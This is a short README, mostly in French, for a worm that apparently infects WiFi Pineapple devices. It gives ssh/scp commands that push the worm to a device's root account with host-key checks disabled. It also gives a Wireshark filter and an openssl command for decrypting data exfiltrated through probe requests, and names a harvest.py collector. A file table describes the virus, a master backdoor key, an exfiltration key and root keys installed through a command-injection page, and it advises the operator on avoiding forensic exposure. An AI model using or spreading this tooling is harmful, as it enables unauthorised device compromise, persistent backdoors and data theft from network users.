
A WiFi Pineapple infecting worm.
./build.sh
ssh -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null [email protected] "mkdir /tospo"
scp -oStrictHostKeyChecking=no -oUserKnownHostsFile=/dev/null dist/tv* [email protected]:/tospo/
Remarque : vous devez disposer d'un appareil configuré OU utiliser le module metasploit pour activer ssh
le filtre wireshark est :
(wlan.fc.type_subtype == 0x04) && (wlan_mgt.tag.length == 32)
printf $(echo "[data copied from wireshark]" | sed -re 's/(..)/\x\1/g') | openssl rsautl -decrypt -inkey tvd.pem
Vous pouvez également utiliser le script harvest.py de la manière suivante :
python harvest.py [monitor-iface]
| File | Purpose |
|---|---|
| tv | Le virus lui-même. |
| tvbd | La clé backdoor « maître », ne distribuez pas la clé privée. |
| tvd | La clé de divulgation, utilisée pour exfiltrer des données via les requêtes probe. |
| tospo_rsa | La clé privée d'identité, spécifique à chaque appareil infecté, utilisée comme clé de transfert. |
| tospo_rsa.pub | La clé publique d'identité, transférée via la page d'injection de commande pour permettre à l'identité privée d'effectuer des actions en tant que root sur l'appareil distant. |
| w | Options de configuration sans fil poussées, utilisées pour restaurer les connexions précédentes. |
| n | Options de configuration réseau poussées, utilisées pour restaurer les connexions précédentes. |
| Remarque : les fichiers commençant par « tv » sont tous transférés lors de l'infection d'un nouvel appareil. N'ajoutez pas de clés privées ou autres avec des noms commençant par « tv », sinon votre clé privée sera exposée à une analyse forensique. |